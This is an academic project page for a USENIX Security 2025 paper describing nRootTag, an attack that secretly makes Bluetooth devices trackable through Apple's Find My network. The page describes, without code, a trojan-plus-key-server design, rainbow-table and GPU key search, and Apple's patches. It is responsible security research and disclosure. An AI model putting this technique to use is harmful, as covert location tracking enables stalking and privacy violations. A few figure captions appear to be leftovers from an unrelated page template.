Tracking You from a Thousand Miles Away! Turning a Bluetooth Device into an Apple AirTag Without Root Privileges

George Mason University
USENIX Security 2025

Attacking billions of devices


A remote attacker can exploit this vulnerability to turn your device—whether it’s a desktop, smartphone, or smartwatch—into an AirTag-like tracker, enabling the attacker to track your location. How does it work? Over 1.5 billion iPhones could act as free tracking agents for the attacker worldwide.

Abstract

Apple’s Find My network, leveraging over a billion active Apple devices, is the world’s largest device-locating network. We investigate the potential misuse of this network to maliciously track Bluetooth devices. We present nRootTag, a novel attack method that transforms computers into trackable “AirTags” without requiring root privileges. The attack achieves a success rate of over 90% within minutes at a cost of only a few US dollars. Or, a rainbow table can be built to search keys instantly. Subsequently, it can locate a computer in minutes, posing a substantial risk to user privacy and safety. The attack is effective on Linux, Windows, and Android systems, and can be employed to track desktops, laptops, smartphones, and IoT devices. Our comprehensive evaluation demonstrates nRootTag’s effectiveness and efficiency across various scenarios.

Overview of Find My Offline Finding

Overview

Figure illustrates the overview of Find My offline finding. (1) Through pairing, an AirTag shares the public / private key information with the owner’s device. (2) When the AirTag is separated from the paired device, it advertises its public key via BLE advertisements, known as lost messages. (3) Nearby Apple devices, referred to as finders, generate encrypted lo cation reports and send them, along with the hashed public key, to the Apple Cloud. (4) The Apple Cloud allows anyone to use a hashed public key to retrieve the associated location reports, which can only be decrypted using the correct private key. To ensure anonymity, finders do not authenticate whether a lost message is sent from an Apple device.

Architecture of nRootTag

Sizes of model trees

Figure illustrates the architecture of our design. (1) The Trojan code runs on the computer to be tracked. It retrieves the advertising address, acquires the matching public key from our server, and then advertises lost messages. (2) The Server processes requests for acquiring public keys through rainbow table lookup or online key search. (3) The Database system, which contains a rainbow table of key information, provides the corresponding public/private key pair for a given advertising address. (4) The Key Generation and Search serves two purposes: it is used to precompute the rainbow table, and invoked to search for a matching public/private key pair on the fly. Finally, given a public key, the server uses its hash value to query the Apple Cloud for location reports, then decrypts the reports using the private key.

GPU Benchmark

ProbeX Overview

Our study examined several consumer-grade GPUs, such as the RTX 3070, RTX 3080, and RTX 4090, as well as data center-grade GPUs, the A100 (80GB) and H100 (80GB). Although the H100 achieves the highest key generation speed, its prohibitively high cost makes the RTX 3080 a more economical option for performance.

Acknowledgments

This work was supported in part by the US National Science Foundation (NSF) under grants CNS-2304720, CNS-2310322, CNS-2309550, and CNS-2309477. It was also supported in part by the Commonwealth Cyber Initiative (CCI). The authors extend their gratitude to the anonymous reviewers and shepherd for their invaluable feedback and suggestions. We also acknowledge Google Earth for the map tiles used in our figures.

In addition, we appreciate the help from the Apple Security Team for their prompt responses and acknowledgement. Apple recently released patches in iOS 18.2, visionOS 2.2, iPadOS 17.7.3, 18.2, watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, Sonoma 14.7.2, Sequoia 15.2 to fix the vulnerability. However, the attack remains effective as long as unpatched iPhones or Apple Watches are in the proximity of the computer running our trojan.

Model retrieval

Model retrieval

BibTeX


@inproceedings{chen2025track,
title={Tracking You from a Thousand Miles Away! Turning a Bluetooth Device into an Apple AirTag Without Root Privileges},
author={Chen, Junming and Ma, Xiaoyue and Luo, Lannan and Zeng, Qiang},
booktitle={USENIX Security Symposium (USENIX Security)},
year={2025}
}